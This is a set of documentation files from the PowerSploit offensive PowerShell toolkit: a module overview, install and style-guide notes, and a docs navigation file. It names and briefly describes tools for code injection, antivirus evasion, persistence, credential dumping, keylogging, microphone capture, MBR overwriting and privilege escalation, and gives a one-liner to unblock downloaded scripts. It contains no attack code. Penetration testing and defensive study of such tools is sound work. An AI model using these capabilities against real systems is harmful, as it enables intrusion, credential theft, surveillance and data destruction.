script.\r\n\r\n```yaml\r\nType: ScriptBlock\r\nParameter Sets: ScriptBlock\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### System.String, System.Management.Automation.ScriptBlock\r\n\r\nAccepts either a string containing the path to a script or a scriptblock.\r\n\r\n## OUTPUTS\r\n\r\n### System.Management.Automation.ScriptBlock\r\n\r\nRemove-Comment returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.exploit-monday.com\r\nhttp://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/]()\r\n\r\n"
  },
  {
    "path": "docs/index.md",
    "content": "## Overview\nPowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.\n\n### CodeExecution\nExecute code on a target machine.\n\n    Invoke-DllInjection - Injects a Dll into the process ID of your choosing.\n    Invoke-ReflectivePEInjection - Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.\n    Invoke-Shellcode - Injects shellcode into the process ID of your choosing or within PowerShell locally.\n    Invoke-WmiCommand - Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel\n\n### ScriptModification\nModify and/or prepare scripts for execution on a compromised machine.\n\n    Out-EncodedCommand - Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.\n    Out-CompressedDll - Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.\n    Out-EncryptedScript - Encrypts text files/scripts.\n    Remove-Comment - Strips comments and extra whitespace from a script.\n\n### Persistence\n\nAdd persistence capabilities to a PowerShell script.\n\n    New-UserPersistenceOption - Configure user-level persistence options for the Add-Persistence function.\n    New-ElevatedPersistenceOption - Configure elevated persistence options for the Add-Persistence function.\n    Add-Persistence - Add persistence capabilities to a script.\n    Install-SSP - Installs a security support provider (SSP) dll.\n    Get-SecurityPackage - Enumerates all loaded security packages (SSPs).\n\n### AntivirusBypass\nAV doesn't stand a chance against PowerShell!\n\n    Find-AVSignature - Locates single Byte AV signatures utilizing the same method as DSplit from \"class101\".\n\n### Exfiltration\nAll your data belong to me!\n\n    Invoke-TokenManipulation - Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread.\n    Invoke-CredentialInjection - Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).\n    Invoke-NinjaCopy - Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.\n    Invoke-Mimikatz - Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.\n    Get-Keystrokes - Logs keys pressed, time and the active window.\n    Get-GPPPassword - Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.\n    Get-GPPAutologon - Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences.\n    Get-TimedScreenshot - A function that takes screenshots at a regular interval and saves them to a folder.\n    New-VolumeShadowCopy - Creates a new volume shadow copy.\n    Get-VolumeShadowCopy - Lists the device paths of all local volume shadow copies.\n    Mount-VolumeShadowCopy - Mounts a volume shadow copy.\n    Remove-VolumeShadowCopy - Deletes a volume shadow copy.\n    Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials.\n    Out-Minidump - Generates a full-memory minidump of a process.\n    Get-MicrophoneAudio - Records audio from system microphone and saves to disk.\n\n### Mayhem\nCause general mayhem with PowerShell.\n\n    Set-MasterBootRecord - Proof of concept code that overwrites the master boot record with the message of your choice.\n    Set-CriticalProcess - Causes your machine to blue screen upon exiting PowerShell.\n\n### Privesc\nTools to help with escalating privileges on a target, including PowerUp.\n\n    PowerUp - Clearing house of common privilege escalation checks, along with some weaponization vectors. \n    Get-System - GetSystem functionality inspired by Meterpreter's getsystem\n\n### Recon\nTools to aid in the reconnaissance phase of a penetration test, including PowerView.\n\n    Invoke-Portscan - Does a simple port scan using regular sockets, based (pretty) loosely on nmap.\n    Get-HttpStatus - Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file.\n    Invoke-ReverseDnsLookup - Scans an IP address range for DNS PTR records.\n    PowerView - PowerView is series of functions that performs network and Windows domain enumeration and exploitation.\n\n## License\n\nThe PowerSploit project and all individual scripts are under the [BSD 3-Clause license](https://raw.github.com/mattifestation/PowerSploit/master/LICENSE) unless explicitly noted otherwise.\n\n## Usage\n\nRefer to the comment-based help in each individual script for detailed usage information.\n\nTo install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.\n\nThe default per-user module path is: \"$Env:HomeDrive$Env:HOMEPATH\\Documents\\WindowsPowerShell\\Modules\"\nThe default computer-level module path is: \"$Env:windir\\System32\\WindowsPowerShell\\v1.0\\Modules\"\n\nTo use the module, type `Import-Module PowerSploit`\n\nTo see the commands imported, type `Get-Command -Module PowerSploit`\n\nIf you're running PowerShell v3 and you want to remove the annoying 'Do you really want to run scripts downloaded from the Internet' warning, once you've placed PowerSploit into your module path, run the following one-liner:\n`$Env:PSModulePath.Split(';') |\n % { if ( Test-Path (Join-Path $_ PowerSploit) )\n {Get-ChildItem $_ -Recurse | Unblock-File} }`\n\nFor help on each individual command, Get-Help is your friend.\n\nNote: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.\n\n## Contribution Rules\n\nWe need contributions! If you have a great idea for PowerSploit, we'd love to add it. New additions will require the following:\n\n* The script must adhere to the style guide. Any exceptions to the guide line would need an explicit, valid reason.\n* The module manifest needs to be updated to reflect the new function being added.\n* A brief description of the function should be added to this README.md\n* Pester tests must accompany all new functions. See the Tests folder for examples but we are looking for tests that at least cover the basics by testing for expected/unexpected input/output and that the function exhibits desired functionality. Make sure the function is passing all tests (preferably in mutiple OSes) prior to submitting a pull request. Thanks!\n\n## Script Style Guide\n\n**For all contributors and future contributors to PowerSploit, I ask that you follow this style guide when writing your scripts/modules.**\n\n* Avoid Write-Host **at all costs**. PowerShell functions/cmdlets are not command-line utilities! Pull requests containing code that uses Write-Host will not be considered. You should output custom objects instead. For more information on creating custom objects, read these articles:\n   * <http://blogs.technet.com/b/heyscriptingguy/archive/2011/05/19/create-custom-objects-in-your-powershell-script.aspx>\n   * <http://technet.microsoft.com/en-us/library/ff730946.aspx>\n\n* If you want to display relevant debugging information to the screen, use Write-Verbose. The user can always just tack on '-Verbose'.\n\n* Always provide descriptive, comment-based help for every script. Also, be sure to include your name and a BSD 3-Clause license (unless there are extenuating circumstances that prevent the application of the BSD license).\n\n* Make sure all functions follow the proper PowerShell verb-noun agreement. Use Get-Verb to list the default verbs used by PowerShell. Exceptions to supported verbs will be considered on a case-by-case basis.\n\n* I prefer that variable names be capitalized and be as descriptive as possible.\n\n* Provide logical spacing in between your code. Indent your code to make it more readable.\n\n* If you find yourself repeating code, write a function.\n\n* Catch all anticipated errors and provide meaningful output. If you have an error that should stop execution of the script, use 'Throw'. If you have an error that doesn't need to stop execution, use Write-Error.\n\n* If you are writing a script that interfaces with the Win32 API, try to avoid compiling C# inline with Add-Type. Try to use the PSReflect module, if possible.\n\n* Do not use hardcoded paths. A script should be useable right out of the box. No one should have to modify the code unless they want to.\n\n* PowerShell v2 compatibility is highly desired.\n\n* Use positional parameters and make parameters mandatory when it makes sense to do so. For example, I'm looking for something like the following:\n   * `[Parameter(Position = 0, Mandatory = $True)]`\n\n* Don't use any aliases unless it makes sense for receiving pipeline input. They make code more difficult to read for people who are unfamiliar with a particular alias.\n\n* Try not to let commands run on for too long. For example, a pipeline is a natural place for a line break.\n\n* Don't go overboard with inline comments. Only use them when certain aspects of the code might be confusing to a reader.\n\n* Rather than using Out-Null to suppress unwanted/irrelevant output, save the unwanted output to $null. Doing so provides a slight performance enhancement.\n\n* Use default values for your parameters when it makes sense. Ideally, you want a script that will work without requiring any parameters.\n\n* If a script creates complex custom objects, include a ps1xml file that will properly format the object's output.\n"
  },
  {
    "path": "mkdocs.yml",
    "content": "site_name: PowerSploit\nrepo_url: https://github.com/PowerShellMafia/PowerSploit/\nsite_favicon: favicon.ico\npages:\n- Home: 'index.md'\n- Recon:\n    - About: 'Recon/index.md'\n    - Functions:\n        - Export-PowerViewCSV: 'Recon/Export-PowerViewCSV.md'\n        - Resolve-IPAddress: 'Recon/Resolve-IPAddress.md'\n        - ConvertTo-SID: 'Recon/ConvertTo-SID.md'\n        - ConvertFrom-SID: 'Recon/ConvertFrom-SID.md'\n        - Convert-ADName: 'Recon/Convert-ADName.md'\n        - ConvertFrom-UACValue: 'Recon/ConvertFrom-UACValue.md'\n        - Add-RemoteConnection: 'Recon/Add-RemoteConnection.md'\n        - Remove-RemoteConnection: 'Recon/Remove-RemoteConnection.md'\n        - Invoke-UserImpersonation: 'Recon/Invoke-UserImpersonation.md'\n        - Invoke-RevertToSelf: 'Recon/Invoke-RevertToSelf.md'\n        - Get-DomainSPNTicket: 'Recon/Get-DomainSPNTicket.md'\n        - Invoke-Kerberoast: 'Recon/Invoke-Kerberoast.md'\n        - Get-PathAcl: 'Recon/Get-PathAcl.md'\n        - Get-DomainDNSZone: 'Recon/Get-DomainDNSZone.md'\n        - Get-DomainDNSRecord: 'Recon/Get-DomainDNSRecord.md'\n        - Get-Domain: 'Recon/Get-Domain.md'\n        - Get-DomainController: 'Recon/Get-DomainController.md'\n        - Get-Forest: 'Recon/Get-Forest.md'\n        - Get-ForestDomain: 'Recon/Get-ForestDomain.md'\n        - Get-ForestGlobalCatalog: 'Recon/Get-ForestGlobalCatalog.md'\n        - Find-DomainObjectPropertyOutlier: 'Recon/Find-DomainObjectPropertyOutlier.md'\n        - Get-DomainUser: 'Recon/Get-DomainUser.md'\n        - New-DomainUser: 'Recon/New-DomainUser.md'\n        - Set-DomainUserPassword: 'Recon/Set-DomainUserPassword.md'\n        - Get-DomainUserEvent: 'Recon/Get-DomainUserEvent.md'\n        - Get-DomainComputer: 'Recon/Get-DomainComputer.md'\n        - Get-DomainObject: 'Recon/Get-DomainObject.md'\n        - Set-DomainObject: 'Recon/Set-DomainObject.md'\n        - Set-DomainObjectOwner: 'Recon/Set-DomainObjectOwner.md'\n        - Get-DomainObjectAcl: 'Recon/Get-DomainObjectAcl.md'\n        - Add-DomainObjectAcl: 'Recon/Add-DomainObjectAcl.md'\n        - Find-InterestingDomainAcl: 'Recon/Find-InterestingDomainAcl.md'\n        - Get-DomainOU: 'Recon/Get-DomainOU.md'\n        - Get-DomainSite: 'Recon/Get-DomainSite.md'\n        - Get-DomainSubnet: 'Recon/Get-DomainSubnet.md'\n        - Get-DomainSID: 'Recon/Get-DomainSID.md'\n        - Get-DomainGroup: 'Recon/Get-DomainGroup.md'\n        - New-DomainGroup: 'Recon/New-DomainGroup.md'\n        - Get-DomainManagedSecurityGroup: 'Recon/Get-DomainManagedSecurityGroup.md'\n        - Get-DomainGroupMember: 'Recon/Get-DomainGroupMember.md'\n        - Add-DomainGroupMember: 'Recon/Add-DomainGroupMember.md'\n        - Get-DomainFileServer: 'Recon/Get-DomainFileServer.md'\n        - Get-DomainDFSShare: 'Recon/Get-DomainDFSShare.md'\n        - Get-DomainGPO: 'Recon/Get-DomainGPO.md'\n        - Get-DomainGPOLocalGroup: 'Recon/Get-DomainGPOLocalGroup.md'\n        - Get-DomainGPOUserLocalGroupMapping: 'Recon/Get-DomainGPOUserLocalGroupMapping.md'\n        - Get-DomainGPOComputerLocalGroupMapping: 'Recon/Get-DomainGPOComputerLocalGroupMapping.md'\n        - Get-DomainPolicy: 'Recon/Get-DomainPolicy.md'\n        - Get-NetLocalGroup: 'Recon/Get-NetLocalGroup.md'\n        - Get-NetLocalGroupMember: 'Recon/Get-NetLocalGroupMember.md'\n        - Get-NetShare: 'Recon/Get-NetShare.md'\n        - Get-NetLoggedon: 'Recon/Get-NetLoggedon.md'\n        - Get-NetSession: 'Recon/Get-NetSession.md'\n        - Get-RegLoggedOn: 'Recon/Get-RegLoggedOn.md'\n        - Get-NetRDPSession: 'Recon/Get-NetRDPSession.md'\n        - Test-AdminAccess: 'Recon/Test-AdminAccess.md'\n        - Get-NetComputerSiteName: 'Recon/Get-NetComputerSiteName.md'\n        - Get-WMIRegProxy: 'Recon/Get-WMIRegProxy.md'\n        - Get-WMIRegLastLoggedOn: 'Recon/Get-WMIRegLastLoggedOn.md'\n        - Get-WMIRegCachedRDPConnection: 'Recon/Get-WMIRegCachedRDPConnection.md'\n        - Get-WMIRegMountedDrive: 'Recon/Get-WMIRegMountedDrive.md'\n        - Get-WMIProcess: 'Recon/Get-WMIProcess.md'\n        - Find-InterestingFile: 'Recon/Find-InterestingFile.md'\n        - Find-DomainUserLocation: 'Recon/Find-DomainUserLocation.md'\n        - Find-DomainProcess: 'Recon/Find-DomainProcess.md'\n        - Find-DomainUserEvent: 'Recon/Find-DomainUserEvent.md'\n        - Find-DomainShare: 'Recon/Find-DomainShare.md'\n        - Find-InterestingDomainShareFile: 'Recon/Find-InterestingDomainShareFile.md'\n        - Find-LocalAdminAccess: 'Recon/Find-LocalAdminAccess.md'\n        - Find-DomainLocalGroupMember: 'Recon/Find-DomainLocalGroupMember.md'\n        - Get-DomainTrust: 'Recon/Get-DomainTrust.md'\n        - Get-ForestTrust: 'Recon/Get-ForestTrust.md'\n        - Get-DomainForeignUser: 'Recon/Get-DomainForeignUser.md'\n        - Get-DomainForeignGroupMember: 'Recon/Get-DomainForeignGroupMember.md'\n        - Get-DomainTrustMapping: 'Recon/Get-DomainTrustMapping.md'\n        - Get-ComputerDetail: 'Recon/Get-ComputerDetail.md'\n        - Get-HttpStatus: 'Recon/Get-HttpStatus.md'\n        - Invoke-Portscan: 'Recon/Invoke-Portscan.md'\n        - Invoke-ReverseDnsLookup: 'Recon/Invoke-ReverseDnsLookup.md'\n- Privesc:\n    - About: 'Privesc/index.md'\n    - Functions:\n        - Get-ModifiablePath: 'Privesc/Get-ModifiablePath.md'\n        - Get-ProcessTokenGroup: 'Privesc/Get-ProcessTokenGroup.md'\n        - Get-ProcessTokenPrivilege: 'Privesc/Get-ProcessTokenPrivilege.md'\n        - Enable-Privilege: 'Privesc/Enable-Privilege.md'\n        - Add-ServiceDacl: 'Privesc/Add-ServiceDacl.md'\n        - Set-ServiceBinaryPath: 'Privesc/Set-ServiceBinaryPath.md'\n        - Test-ServiceDaclPermission: 'Privesc/Test-ServiceDaclPermission.md'\n        - Get-UnquotedService: 'Privesc/Get-UnquotedService.md'\n        - Get-ModifiableServiceFile: 'Privesc/Get-ModifiableServiceFile.md'\n        - Get-ModifiableService: 'Privesc/Get-ModifiableService.md'\n        - Get-ServiceDetail: 'Privesc/Get-ServiceDetail.md'\n        - Invoke-ServiceAbuse: 'Privesc/Invoke-ServiceAbuse.md'\n        - Write-ServiceBinary: 'Privesc/Write-ServiceBinary.md'\n        - Install-ServiceBinary: 'Privesc/Install-ServiceBinary.md'\n        - Restore-ServiceBinary: 'Privesc/Restore-ServiceBinary.md'\n        - Find-ProcessDLLHijack: 'Privesc/Find-ProcessDLLHijack.md'\n        - Find-PathDLLHijack: 'Privesc/Find-PathDLLHijack.md'\n        - Write-HijackDll: 'Privesc/Write-HijackDll.md'\n        - Get-RegistryAlwaysInstallElevated: 'Privesc/Get-RegistryAlwaysInstallElevated.md'\n        - Get-RegistryAutoLogon: 'Privesc/Get-RegistryAutoLogon.md'\n        - Get-ModifiableRegistryAutoRun: 'Privesc/Get-ModifiableRegistryAutoRun.md'\n        - Get-ModifiableScheduledTaskFile: 'Privesc/Get-ModifiableScheduledTaskFile.md'\n        - Get-UnattendedInstallFile: 'Privesc/Get-UnattendedInstallFile.md'\n        - Get-WebConfig: 'Privesc/Get-WebConfig.md'\n        - Get-ApplicationHost: 'Privesc/Get-ApplicationHost.md'\n        - Get-SiteListPassword: 'Privesc/Get-SiteListPassword.md'\n        - Get-CachedGPPPassword: 'Privesc/Get-CachedGPPPassword.md'\n        - Write-UserAddMSI: 'Privesc/Write-UserAddMSI.md'\n        - Invoke-WScriptUACBypass: 'Privesc/Invoke-WScriptUACBypass.md'\n        - Invoke-PrivescAudit: 'Privesc/Invoke-PrivescAudit.md'\n        - Get-System: 'Privesc/Get-System.md'\n- AntiVirus:\n    - Functions:\n        - Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md'\n- CodeExecution:\n    - Functions:\n        - Invoke-DllInjection: 'CodeExecution/Invoke-DllInjection.md'\n        - Invoke-ReflectivePEInjection: 'CodeExecution/Invoke-ReflectivePEInjection.md'\n        - Invoke-Shellcode: 'CodeExecution/Invoke-Shellcode.md'\n        - Invoke-WmiCommand: 'CodeExecution/Invoke-WmiCommand.md'\n- Mayhem:\n    - Functions:\n        - Set-MasterBootRecord: 'Mayhem/Set-MasterBootRecord.md'\n        - Set-CriticalProcess: 'Mayhem/Set-CriticalProcess.md'\n- Persistence:\n    - Functions:\n        - New-ElevatedPersistenceOption: 'Persistence/New-ElevatedPersistenceOption.md'\n        - New-UserPersistenceOption: 'Persistence/New-UserPersistenceOption.md'\n        - Add-Persistence: 'Persistence/Add-Persistence.md'\n        - Install-SSP: 'Persistence/Install-SSP.md'\n        - Get-SecurityPackage: 'Persistence/Get-SecurityPackage.md'\n- ScriptModification:\n    - Functions:\n        - Out-CompressedDll: 'ScriptModification/Out-CompressedDll.md'\n        - Out-EncodedCommand: 'ScriptModification/Out-EncodedCommand.md'\n        - Out-EncryptedScript: 'ScriptModification/Out-EncryptedScript.md'\n        - Remove-Comment: 'ScriptModification/Remove-Comment.md'\n"
  }
]